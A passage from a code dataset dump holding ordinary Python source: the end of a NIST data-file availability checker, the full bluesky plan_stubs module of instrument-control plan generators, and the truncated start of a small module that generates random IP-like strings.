'downloadURL' in cmp and \\\n not self.has_pdr_url(cmp['downloadURL']):\n continue\n if not self.available(cmp, strict, False):\n missing.append(cmp.get('filepath') or cmp.get('downloadURL'))\n\n return missing\n\n def all_files_available(self, strict=False, viadistrib=True):\n \"\"\"\n return True if all of the data file components are available in some\n form. This is a check to make sure that all\n of the distributions listed in the NERDm record are either in the \n present bag or otherwise previously preserved and available; in this\n case, the returned list will be empty.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n return len(self.unavailable_files(strict, viadistrib)) == 0\n\n def unindexed_files(self, viadistrib=True):\n \"\"\"\n return the data file component filepaths that are missing from the \n mulitbag file lookup list. This is a check to make sure that all\n of the distributions listed in the NERDm record are findable either in \n the present bag or other member bags; in this case, the returned list \n will be empty.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n missing = []\n nerd = self.bag.nerdm_record(False)\n for cmp in nerd.get('components',[]):\n if \"dcat:Distribution\" not in cmp.get('@type',[]) or \\\n 'filepath' not in cmp:\n continue\n if viadistrib and 'downloadURL' in cmp and \\\n not self.has_pdr_url(cmp['downloadURL']):\n continue\n if not self.bag_location(cmp):\n missing.append(cmp.get('filepath') or cmp.get('downloadURL'))\n\n return missing\n\n def all_files_indexed(self, viadistrib=True):\n \"\"\"\n return True if all the data file components given in the NERDm metadata\n are included in the multibag file lookup list. This is a check to make \n sure that all of the distributions listed in the NERDm record are \n findable either in the present bag or other member bags.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n return len(self.unindexed_files(viadistrib)) == 0\n\n def check_all_data_files(self, strict=False, viadistrib=True):\n \"\"\"\n return True if all the data files described in the NERDm metadata are\n findable and available. This returns False if either \n all_files_indexed() or all_files_available() return False.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n return self.all_files_indexed(viadistrib) and \\\n self.all_files_available(strict, viadistrib)\n\n","repo_name":"usnistgov/oar-pdr-py","sub_path":"python/nistoar/pdr/publish/bagger/datachecker.py","file_name":"datachecker.py","file_ext":"py","file_size_in_byte":18883,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"6744002980","text":"import itertools\nimport uuid\nfrom cycler import cycler\nimport operator\nfrom functools import reduce\nfrom collections.abc import Iterable\nimport time\nimport warnings\n\ntry:\n # cytools is a drop-in replacement for toolz, implemented in Cython\n from cytools import partition\nexcept ImportError:\n from toolz import partition\n\nfrom .protocols import Locatable, Triggerable, Status\nfrom .utils import (\n get_hinted_fields,\n merge_cycler,\n separate_devices,\n all_safe_rewind,\n Msg,\n ensure_generator,\n short_uid as _short_uid,\n)\n\n\ndef declare_stream(*objs, name=None, collect=False):\n \"\"\"\n Bundle future readings into a new Event document.\n\n Parameters\n ----------\n name : string\n name given to event stream, used to convenient identification\n collect : bool, optional\n collect as well as describe when declaring the stream\n default is `False`\n\n Yields\n ------\n msg : Msg\n Msg('create', name=name)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.save`\n \"\"\"\n return (yield Msg('declare_stream', None, *separate_devices(objs), name=name, collect=collect))\n\n\ndef create(name='primary'):\n \"\"\"\n Bundle future readings into a new Event document.\n\n Parameters\n ----------\n name : string, optional\n name given to event stream, used to convenient identification\n default is 'primary'\n\n Yields\n ------\n msg : Msg\n Msg('create', name=name)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.save`\n \"\"\"\n return (yield Msg('create', name=name))\n\n\ndef save():\n \"\"\"\n Close a bundle of readings and emit a completed Event document.\n\n Yields\n ------\n msg : Msg\n Msg('save')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.create`\n \"\"\"\n return (yield Msg('save'))\n\n\ndef drop():\n \"\"\"\n Drop a bundle of readings without emitting a completed Event document.\n\n Yields\n ------\n msg : Msg\n Msg('drop')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.save`\n :func:`bluesky.plan_stubs.create`\n \"\"\"\n return (yield Msg('drop'))\n\n\ndef read(obj):\n \"\"\"\n Take a reading and add it to the current bundle of readings.\n\n Parameters\n ----------\n obj : Device or Signal\n\n Yields\n ------\n msg : Msg\n Msg('read', obj)\n \"\"\"\n return (yield Msg('read', obj))\n\n\ndef monitor(obj, *, name=None, **kwargs):\n \"\"\"\n Asynchronously monitor for new values and emit Event documents.\n\n Parameters\n ----------\n obj : Signal\n args :\n passed through to ``obj.subscribe()``\n name : string, optional\n name of event stream; default is None\n kwargs :\n passed through to ``obj.subscribe()``\n\n Yields\n ------\n msg : Msg\n ``Msg('monitor', obj, *args, **kwargs)``\n\n See Also\n --------\n :func:`bluesky.plan_stubs.unmonitor`\n \"\"\"\n return (yield Msg('monitor', obj, name=name, **kwargs))\n\n\ndef unmonitor(obj):\n \"\"\"\n Stop monitoring.\n\n Parameters\n ----------\n obj : Signal\n\n Yields\n ------\n msg : Msg\n Msg('unmonitor', obj)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.monitor`\n \"\"\"\n return (yield Msg('unmonitor', obj))\n\n\ndef null():\n \"\"\"\n Yield a no-op Message. (Primarily for debugging and testing.)\n\n Yields\n ------\n msg : Msg\n Msg('null')\n \"\"\"\n return (yield Msg('null'))\n\n\ndef abs_set(obj, *args, group=None, wait=False, **kwargs):\n \"\"\"\n Set a value. Optionally, wait for it to complete before continuing.\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n args :\n passed to obj.set()\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.rel_set`\n :func:`bluesky.plan_stubs.wait`\n :func:`bluesky.plan_stubs.mv`\n \"\"\"\n if wait and group is None:\n group = str(uuid.uuid4())\n ret = yield Msg('set', obj, *args, group=group, **kwargs)\n if wait:\n yield Msg('wait', None, group=group)\n return ret\n\n\ndef rel_set(obj, *args, group=None, wait=False, **kwargs):\n \"\"\"\n Set a value relative to current value. Optionally, wait before continuing.\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n args :\n passed to obj.set()\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.abs_set`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n from .preprocessors import relative_set_wrapper\n\n return (\n yield from relative_set_wrapper(\n abs_set(obj, *args, group=group, wait=wait, **kwargs)\n )\n )\n\n\ndef mv(*args, group=None, **kwargs):\n \"\"\"\n Move one or more devices to a setpoint. Wait for all to complete.\n\n If more than one device is specified, the movements are done in parallel.\n\n Parameters\n ----------\n args :\n device1, value1, device2, value2, ...\n group : string, optional\n Used to mark these as a unit to be waited on.\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.abs_set`\n :func:`bluesky.plan_stubs.mvr`\n \"\"\"\n group = group or str(uuid.uuid4())\n status_objects = []\n\n cyl = reduce(operator.add, [cycler(obj, [val]) for obj, val in partition(2, args)])\n (step,) = merge_cycler(cyl)\n for obj, val in step.items():\n ret = yield Msg('set', obj, val, group=group, **kwargs)\n status_objects.append(ret)\n yield Msg('wait', None, group=group)\n return tuple(status_objects)\n\n\nmov = mv # synonym\n\n\ndef mvr(*args, group=None, **kwargs):\n \"\"\"\n Move one or more devices to a relative setpoint. Wait for all to complete.\n\n If more than one device is specified, the movements are done in parallel.\n\n Parameters\n ----------\n args :\n device1, value1, device2, value2, ...\n group : string, optional\n Used to mark these as a unit to be waited on.\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.rel_set`\n :func:`bluesky.plan_stubs.mv`\n \"\"\"\n objs = []\n for obj, val in partition(2, args):\n objs.append(obj)\n\n from .preprocessors import relative_set_decorator\n\n @relative_set_decorator(objs)\n def inner_mvr():\n return (yield from mv(*args, group=group, **kwargs))\n\n return (yield from inner_mvr())\n\n\nmovr = mvr # synonym\n\n\ndef rd(obj, *, default_value=0):\n \"\"\"Reads a single-value non-triggered object\n\n This is a helper plan to get the scalar value out of a Device\n (such as an EpicsMotor or a single EpicsSignal).\n\n For devices that implement the Locatable protocol, the location is canonical\n and is returned without parsing the read keys.\n\n For devices that have more than one read key the following rules are used:\n\n - if exactly 1 field is hinted that value is used\n - if no fields are hinted and there is exactly 1 value in the\n reading that value is used\n - if more than one field is hinted an Exception is raised\n - if no fields are hinted and there is more than one key in the reading an\n Exception is raised\n\n The devices is not triggered and this plan does not create any Events\n\n Parameters\n ----------\n obj : Device\n The device to be read\n\n default_value : Any\n The value to return when not running in a \"live\" RunEngine.\n This come ups when ::\n\n ret = yield Msg('read', obj)\n assert ret is None\n\n the plan is passed to `list` or some other iterator that\n repeatedly sends `None` into the plan to advance the\n generator.\n\n Returns\n -------\n val : Any or None\n The \"single\" value of the device\n\n \"\"\"\n # Location is canonical if it exists\n if isinstance(obj, Locatable):\n location = yield Msg(\"locate\", obj)\n if location is None:\n # list-ify mode\n return default_value\n else:\n return location[\"readback\"]\n\n hints = get_hinted_fields(obj)\n if len(hints) > 1:\n msg = (\n f\"Your object {obj} ({obj.name}.{getattr(obj, 'dotted_name', '')}) \"\n f\"has {len(hints)} items hinted ({hints}). We do not know how to \"\n \"pick out a single value. Please adjust the hinting by setting the \"\n \"kind of the components of this device or by reading one of its components\"\n )\n raise ValueError(msg)\n elif len(hints) == 0:\n hint = None\n if hasattr(obj, \"read_attrs\"):\n if len(obj.read_attrs) != 1:\n msg = (\n f\"Your object {obj} ({obj.name}.{getattr(obj, 'dotted_name', '')}) \"\n f\"and has {len(obj.read_attrs)} read attrs. We do not know how to \"\n \"pick out a single value. Please adjust the hinting/read_attrs by \"\n \"setting the kind of the components of this device or by reading one \"\n \"of its components\"\n )\n\n raise ValueError(msg)\n # len(hints) == 1\n else:\n (hint,) = hints\n\n ret = yield from read(obj)\n\n # list-ify mode\n if ret is None:\n return default_value\n\n if hint is not None:\n return ret[hint][\"value\"]\n\n # handle the no hint 1 field case\n try:\n (data,) = ret.values()\n except ValueError as er:\n msg = (\n f\"Your object {obj} ({obj.name}.{getattr(obj, 'dotted_name', '')}) \"\n f\"and has {len(ret)} read values. We do not know how to pick out a \"\n \"single value. Please adjust the hinting/read_attrs by setting the \"\n \"kind of the components of this device or by reading one of its components\"\n )\n\n raise ValueError(msg) from er\n else:\n return data[\"value\"]\n\n\ndef stop(obj):\n \"\"\"\n Stop a device.\n\n Parameters\n ----------\n obj : Device\n\n Yields\n ------\n msg : Msg\n \"\"\"\n return (yield Msg('stop', obj))\n\n\ndef trigger(obj, *, group=None, wait=False):\n \"\"\"\n Trigger and acquisition. Optionally, wait for it to complete.\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n\n Yields\n ------\n msg : Msg\n \"\"\"\n ret = yield Msg('trigger', obj, group=group)\n if wait:\n yield Msg('wait', None, group=group)\n return ret\n\n\ndef sleep(time):\n \"\"\"\n Tell the RunEngine to sleep, while asynchronously doing other processing.\n\n This is not the same as ``import time; time.sleep()`` because it allows\n other actions, like interruptions, to be processed during the sleep.\n\n Parameters\n ----------\n time : float\n seconds\n\n Yields\n ------\n msg : Msg\n Msg('sleep', None, time)\n \"\"\"\n return (yield Msg('sleep', None, time))\n\n\ndef wait(group=None, *, timeout=None):\n \"\"\"\n Wait for all statuses in a group to report being finished.\n\n Parameters\n ----------\n group : string (or any hashable object), optional\n Identifier given to `abs_set`, `rel_set`, `trigger`; None by default\n\n Yields\n ------\n msg : Msg\n Msg('wait', None, group=group)\n \"\"\"\n return (yield Msg('wait', None, group=group, timeout=timeout))\n\n\n_wait = wait # for internal references to avoid collision with 'wait' kwarg\n\n\ndef checkpoint():\n \"\"\"\n If interrupted, rewind to this point.\n\n Yields\n ------\n msg : Msg\n Msg('checkpoint')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.clear_checkpoint`\n \"\"\"\n return (yield Msg('checkpoint'))\n\n\ndef clear_checkpoint():\n \"\"\"\n Designate that it is not safe to resume. If interrupted or paused, abort.\n\n Yields\n ------\n msg : Msg\n Msg('clear_checkpoint')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.checkpoint`\n \"\"\"\n return (yield Msg('clear_checkpoint'))\n\n\ndef pause():\n \"\"\"\n Pause and wait for the user to resume.\n\n Yields\n ------\n msg : Msg\n Msg('pause')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.deferred_pause`\n :func:`bluesky.plan_stubs.sleep`\n \"\"\"\n return (yield Msg('pause', None, defer=False))\n\n\ndef deferred_pause():\n \"\"\"\n Pause at the next checkpoint.\n\n Yields\n ------\n msg : Msg\n Msg('pause', defer=True)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.pause`\n :func:`bluesky.plan_stubs.sleep`\n \"\"\"\n return (yield Msg('pause', None, defer=True))\n\n\ndef input_plan(prompt=''):\n \"\"\"\n Prompt the user for text input.\n\n Parameters\n ----------\n prompt : str\n prompt string, e.g., 'enter user name' or 'enter next position'\n\n Yields\n ------\n msg : Msg\n Msg('input', prompt=prompt)\n \"\"\"\n return (yield Msg('input', prompt=prompt))\n\n\ndef kickoff(obj, *, group=None, wait=False, **kwargs):\n \"\"\"\n Kickoff a fly-scanning device.\n\n Parameters\n ----------\n obj : fly-able\n Device with 'kickoff', 'complete', and 'collect' methods\n group : string (or any hashable object), optional\n identifier used by 'wait'\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n kwargs\n passed through to ``obj.kickoff()``\n\n Yields\n ------\n msg : Msg\n Msg('kickoff', obj)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.complete`\n :func:`bluesky.plan_stubs.collect`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n ret = (yield Msg('kickoff', obj, group=group, **kwargs))\n if wait:\n yield from _wait(group=group)\n return ret\n\n\ndef complete(obj, *, group=None, wait=False, **kwargs):\n \"\"\"\n Tell a flyer, 'stop collecting, whenever you are ready'.\n\n The flyer returns a status object. Some flyers respond to this\n command by stopping collection and returning a finished status\n object immediately. Other flyers finish their given course and\n finish whenever they finish, irrespective of when this command is\n issued.\n\n Parameters\n ----------\n obj : fly-able\n Device with 'kickoff', 'complete', and 'collect' methods\n group : string (or any hashable object), optional\n identifier used by 'wait'\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n kwargs\n passed through to ``obj.complete()``\n\n Yields\n ------\n msg : Msg\n a 'complete' Msg and maybe a 'wait' message\n\n See Also\n --------\n :func:`bluesky.plan_stubs.kickoff`\n :func:`bluesky.plan_stubs.collect`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n ret = yield Msg('complete', obj, group=group, **kwargs)\n if wait:\n yield from _wait(group=group)\n return ret\n\n\ndef collect(obj, *, stream=False, return_payload=True, name=None):\n \"\"\"\n Collect data cached by a fly-scanning device and emit documents.\n\n Parameters\n ----------\n obj : fly-able\n Device with 'kickoff', 'complete', and 'collect' methods\n stream : boolean, optional\n If False (default), emit Event documents in one bulk dump. If True,\n emit events one at time.\n return_payload: boolean, optional\n If True (default), return the collected Events. If False, return None.\n Using ``stream=True`` and ``return_payload=False`` together avoids\n accumulating the documents in memory: they are emitted as they are\n collected, and they are not accumulated.\n name: str, optional\n If not None, will collect for the named string specifically, else collect will be performed\n on all streams.\n\n Yields\n ------\n msg : Msg\n Msg('collect', obj)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.kickoff`\n :func:`bluesky.plan_stubs.complete`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n return (yield Msg('collect', obj, stream=stream, return_payload=return_payload, name=name))\n\n\ndef configure(obj, *args, **kwargs):\n \"\"\"\n Change Device configuration and emit an updated Event Descriptor document.\n\n Parameters\n ----------\n obj : Device\n args\n passed through to ``obj.configure()``\n kwargs\n passed through to ``obj.configure()``\n\n Yields\n ------\n msg : Msg\n ``Msg('configure', obj, *args, **kwargs)``\n \"\"\"\n return (yield Msg('configure', obj, *args, **kwargs))\n\n\ndef stage(obj, *, group=None, wait=None):\n \"\"\"\n 'Stage' a device (i.e., prepare it for use, 'arm' it).\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.unstage`\n :func:`bluesky.plan_stubs.stage_all`\n \"\"\"\n ret = yield Msg('stage', obj, group=group)\n old_style = not isinstance(ret, Status)\n if old_style:\n if (wait is None) or wait:\n # Old-style devices will just block. We do not need to explicitly wait.\n pass\n else: # wait is False-y\n # No way to tell old-style devices not to wait\n raise RuntimeError(f\"{obj}: Is an old style device and cannot be told not to wait\")\n else:\n if wait:\n yield Msg('wait', None, group=group)\n return ret\n\n\ndef stage_all(*args, group=None):\n \"\"\"\n 'Stage' one or more devices (i.e., prepare them for use, 'arm' them).\n\n Parameters\n ----------\n args :\n device1, device2, device3, ...\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.stage`\n :func:`bluesky.plan_stubs.unstage_all`\n \"\"\"\n group = group or str(uuid.uuid4())\n status_objects = []\n\n for obj in args:\n ret = yield Msg('stage', obj, group=group)\n if isinstance(ret, Status):\n status_objects.append(ret)\n\n if status_objects:\n yield Msg('wait', None, group=group)\n\n\ndef unstage(obj, *, group=None, wait=None):\n \"\"\"\n 'Unstage' a device (i.e., put it in standby, 'disarm' it).\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.stage`\n :func:`bluesky.plan_stubs.unstage_all`\n \"\"\"\n ret = yield Msg('unstage', obj, group=group)\n old_style = not isinstance(ret, Status)\n if old_style:\n if (wait is None) or wait:\n # Old-style devices will just block. We do not need to explicitly wait.\n pass\n else:\n # No way to tell old-style devices not to wait\n raise RuntimeError(f\"{obj}: Is an old style device and cannot be told not to wait\")\n else:\n if wait:\n yield Msg('wait', None, group=group)\n return ret\n\n\ndef unstage_all(*args, group=None):\n \"\"\"\n 'Unstage' one or more devices (i.e., put them in standby, 'disarm' them).\n\n Parameters\n ----------\n args :\n device1, device2, device3, ...\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.unstage`\n :func:`bluesky.plan_stubs.stage_all`\n \"\"\"\n group = group or str(uuid.uuid4())\n status_objects = []\n\n for obj in args:\n ret = yield Msg('unstage', obj, group=group)\n if isinstance(ret, Status):\n status_objects.append(ret)\n\n if status_objects:\n yield Msg('wait', None, group=group)\n\n\ndef subscribe(name, func):\n \"\"\"\n Subscribe the stream of emitted documents.\n\n Parameters\n ----------\n name : {'all', 'start', 'descriptor', 'event', 'stop'}\n func : callable\n Expected signature: ``f(name, doc)`` where ``name`` is one of the\n strings above ('all, 'start', ...) and ``doc`` is a dict\n\n Yields\n ------\n msg : Msg\n Msg('subscribe', None, func, name)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.unsubscribe`\n \"\"\"\n return (yield Msg('subscribe', None, func, name))\n\n\ndef unsubscribe(token):\n \"\"\"\n Remove a subscription.\n\n Parameters\n ----------\n token : int\n token returned by processing a 'subscribe' message\n\n Yields\n ------\n msg : Msg\n Msg('unsubscribe', token=token)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.subscribe`\n \"\"\"\n return (yield Msg('unsubscribe', token=token))\n\n\ndef install_suspender(suspender):\n \"\"\"\n Install a suspender during a plan.\n\n Parameters\n ----------\n suspender : :class:`bluesky.suspenders.SuspenderBase`\n The suspender to install\n\n Yields\n ------\n msg : Msg\n Msg('install_suspender', None, suspender)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.remove_suspender`\n \"\"\"\n return (yield Msg('install_suspender', None, suspender))\n\n\ndef remove_suspender(suspender):\n \"\"\"\n Remove a suspender during a plan.\n\n Parameters\n ----------\n suspender : :class:`bluesky.suspenders.SuspenderBase`\n The suspender to remove\n\n Yields\n ------\n msg : Msg\n Msg('remove_suspender', None, suspender)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.install_suspender`\n \"\"\"\n return (yield Msg('remove_suspender', None, suspender))\n\n\ndef open_run(md=None):\n \"\"\"\n Mark the beginning of a new 'run'. Emit a RunStart document.\n\n Parameters\n ----------\n md : dict, optional\n metadata\n\n Yields\n ------\n msg : Msg\n ``Msg('open_run', **md)``\n\n See Also\n --------\n :func:`bluesky.plans_stubs.close_run`\n \"\"\"\n return (yield Msg('open_run', **(md or {})))\n\n\ndef close_run(exit_status=None, reason=None):\n \"\"\"\n Mark the end of the current 'run'. Emit a RunStop document.\n\n Parameters\n ----------\n exit_status : {None, 'success', 'abort', 'fail'}\n The exit status to report in the Stop document\n reason : str, optional\n Long-form description of why the run ended\n\n Yields\n ------\n msg : Msg\n Msg('close_run')\n\n See Also\n --------\n :func:`bluesky.plans_stubs.open_run`\n \"\"\"\n return (yield Msg('close_run', exit_status=exit_status, reason=reason))\n\n\ndef wait_for(futures, **kwargs):\n \"\"\"\n Low-level: wait for a list of ``asyncio.Future`` objects to set (complete).\n\n Parameters\n ----------\n futures : collection\n collection of asyncio.Future objects\n kwargs\n passed through to ``asyncio.wait()``\n\n Yields\n ------\n msg : Msg\n ``Msg('wait_for', None, futures, **kwargs)``\n\n See Also\n --------\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n return (yield Msg('wait_for', None, futures, **kwargs))\n\n\ndef trigger_and_read(devices, name='primary'):\n \"\"\"\n Trigger and read a list of detectors and bundle readings into one Event.\n\n Parameters\n ----------\n devices : iterable\n devices to trigger (if they have a trigger method) and then read\n name : string, optional\n event stream name, a convenient human-friendly identifier; default\n name is 'primary'\n\n Yields\n ------\n msg : Msg\n messages to 'trigger', 'wait' and 'read'\n \"\"\"\n from .preprocessors import contingency_wrapper\n # If devices is empty, don't emit 'create'/'save' messages.\n if not devices:\n yield from null()\n devices = separate_devices(devices) # remove redundant entries\n rewindable = all_safe_rewind(devices) # if devices can be re-triggered\n\n def inner_trigger_and_read():\n grp = _short_uid('trigger')\n no_wait = True\n for obj in devices:\n if isinstance(obj, Triggerable):\n no_wait = False\n yield from trigger(obj, group=grp)\n # Skip 'wait' if none of the devices implemented a trigger method.\n if not no_wait:\n yield from wait(group=grp)\n yield from create(name)\n\n def read_plan():\n ret = {} # collect and return readings to give plan access to them\n for obj in devices:\n reading = (yield from read(obj))\n if reading is not None:\n ret.update(reading)\n return ret\n\n def standard_path():\n yield from save()\n\n def exception_path(exp):\n yield from drop()\n raise exp\n\n ret = yield from contingency_wrapper(\n read_plan(),\n except_plan=exception_path,\n else_plan=standard_path\n )\n return ret\n\n from .preprocessors import rewindable_wrapper\n return (yield from rewindable_wrapper(inner_trigger_and_read(),\n rewindable))\n\n\ndef broadcast_msg(command, objs, *args, **kwargs):\n \"\"\"\n Generate many copies of a message, applying it to a list of devices.\n\n Parameters\n ----------\n command : string\n devices : iterable\n ``*args``\n args for message\n ``**kwargs``\n kwargs for message\n\n Yields\n ------\n msg : Msg\n \"\"\"\n return_vals = []\n for o in objs:\n ret = yield Msg(command, o, *args, **kwargs)\n return_vals.append(ret)\n\n return return_vals\n\n\ndef repeater(n, gen_func, *args, **kwargs):\n \"\"\"\n Generate n chained copies of the messages from gen_func\n\n Parameters\n ----------\n n : int or None\n total number of repetitions; if None, infinite\n gen_func : callable\n returns generator instance\n ``*args``\n args for gen_func\n ``**kwargs``\n kwargs for gen_func\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.caching_repeater`\n \"\"\"\n it = range\n if n is None:\n n = 0\n it = itertools.count\n\n for j in it(n):\n yield from gen_func(*args, **kwargs)\n\n\ndef caching_repeater(n, plan):\n \"\"\"\n Generate n chained copies of the messages in a plan.\n\n This is different from ``repeater`` above because it takes in a\n generator or iterator, not a function that returns one.\n\n Parameters\n ----------\n n : int or None\n total number of repetitions; if None, infinite\n plan : iterable\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.repeater`\n \"\"\"\n warnings.warn(\"The caching_repeater will be removed in a future version \"\n \"of bluesky.\", stacklevel=2)\n if n is None:\n gen = itertools.count(0)\n else:\n gen = range(n)\n\n lst_plan = list(plan)\n for _ in gen:\n yield from (m for m in lst_plan)\n\n\ndef one_shot(detectors, take_reading=None):\n \"\"\"Inner loop of a count.\n\n This is the default function for ``per_shot`` in count plans.\n\n Parameters\n ----------\n detectors : Iterable[OphydObj]\n devices to read\n\n take_reading : plan, optional\n function to do the actual acquisition ::\n\n def take_reading(dets, name='primary'):\n yield from ...\n\n Callable[List[OphydObj], Optional[str]] -> Generator[Msg], optional\n\n Defaults to `trigger_and_read`\n \"\"\"\n take_reading = trigger_and_read if take_reading is None else take_reading\n yield Msg('checkpoint')\n yield from take_reading(list(detectors))\n\n\ndef one_1d_step(detectors, motor, step, take_reading=None):\n \"\"\"\n Inner loop of a 1D step scan\n\n This is the default function for ``per_step`` param in 1D plans.\n\n Parameters\n ----------\n detectors : iterable\n devices to read\n motor : Settable\n The motor to move\n step : Any\n Where to move the motor to\n take_reading : plan, optional\n function to do the actual acquisition ::\n\n def take_reading(dets, name='primary'):\n yield from ...\n\n Callable[List[OphydObj], Optional[str]] -> Generator[Msg], optional\n\n Defaults to `trigger_and_read`\n \"\"\"\n take_reading = trigger_and_read if take_reading is None else take_reading\n\n def move():\n grp = _short_uid('set')\n yield Msg('checkpoint')\n yield Msg('set', motor, step, group=grp)\n yield Msg('wait', None, group=grp)\n\n yield from move()\n return (yield from take_reading(list(detectors) + [motor]))\n\n\ndef move_per_step(step, pos_cache):\n \"\"\"\n Inner loop of an N-dimensional step scan without any readings\n\n This can be used as a building block for custom ``per_step`` stubs.\n\n Parameters\n ----------\n step : dict\n mapping motors to positions in this step\n pos_cache : dict\n mapping motors to their last-set positions\n \"\"\"\n yield Msg('checkpoint')\n grp = _short_uid('set')\n for motor, pos in step.items():\n if pos == pos_cache[motor]:\n # This step does not move this motor.\n continue\n yield Msg('set', motor, pos, group=grp)\n pos_cache[motor] = pos\n yield Msg('wait', None, group=grp)\n\n\ndef one_nd_step(detectors, step, pos_cache, take_reading=None):\n \"\"\"\n Inner loop of an N-dimensional step scan\n\n This is the default function for ``per_step`` param`` in ND plans.\n\n Parameters\n ----------\n detectors : iterable\n devices to read\n step : dict\n mapping motors to positions in this step\n pos_cache : dict\n mapping motors to their last-set positions\n take_reading : plan, optional\n function to do the actual acquisition ::\n\n def take_reading(dets, name='primary'):\n yield from ...\n\n Callable[List[OphydObj], Optional[str]] -> Generator[Msg], optional\n\n Defaults to `trigger_and_read`\n \"\"\"\n take_reading = trigger_and_read if take_reading is None else take_reading\n motors = step.keys()\n yield from move_per_step(step, pos_cache)\n yield from take_reading(list(detectors) + list(motors))\n\n\ndef repeat(plan, num=1, delay=None):\n \"\"\"\n Repeat a plan num times with delay and checkpoint between each repeat.\n\n This is different from ``repeater`` and ``caching_repeater`` in that it\n adds ``checkpoint`` and optionally ``sleep`` messages if delay is provided.\n This is intended for users who need the structure of ``count`` but do not\n want to reimplement the control flow.\n\n Parameters\n ----------\n plan: callable\n Callable that returns an iterable of Msg objects\n num : integer, optional\n number of readings to take; default is 1\n\n If None, capture data until canceled\n delay : iterable or scalar, optional\n time delay between successive readings; default is 0\n\n Notes\n -----\n If ``delay`` is an iterable, it must have at least ``num - 1`` entries or\n the plan will raise a ``ValueError`` during iteration.\n \"\"\"\n # Create finite or infinite counter\n if num is None:\n iterator = itertools.count()\n else:\n iterator = range(num)\n\n # If delay is a scalar, repeat it forever. If it is an iterable, leave it.\n if not isinstance(delay, Iterable):\n delay = itertools.repeat(delay)\n else:\n try:\n num_delays = len(delay)\n except TypeError:\n # No way to tell in advance if we have enough delays.\n pass\n else:\n if num - 1 > num_delays:\n raise ValueError(\"num=%r but delays only provides %r \"\n \"entries\" % (num, num_delays))\n delay = iter(delay)\n\n def repeated_plan():\n for i in iterator:\n now = time.time() # Intercept the flow in its earliest moment.\n yield Msg('checkpoint')\n yield from ensure_generator(plan())\n try:\n d = next(delay)\n except StopIteration:\n if i + 1 == num:\n break\n elif num is None:\n break\n else:\n # num specifies a number of iterations less than delay\n raise ValueError(\"num=%r but delays only provides %r \"\n \"entries\" % (num, i))\n if d is not None:\n d = d - (time.time() - now)\n if d > 0: # Sleep if and only if time is left to do it.\n yield Msg('sleep', None, d)\n\n return (yield from repeated_plan())\n","repo_name":"bluesky/bluesky","sub_path":"bluesky/plan_stubs.py","file_name":"plan_stubs.py","file_ext":"py","file_size_in_byte":33522,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"37"} +{"seq_id":"25107524699","text":"import random\nimport base64\nfrom .models import db, IPs\nfrom . import app\n\n\nrandom.seed()\n\ndef setIPnumber():\n return \".\".join([str(random.randint(20, 170)) for _ in range(4)])\n\ndef setIPs():\n\n with app.app_context():\n if 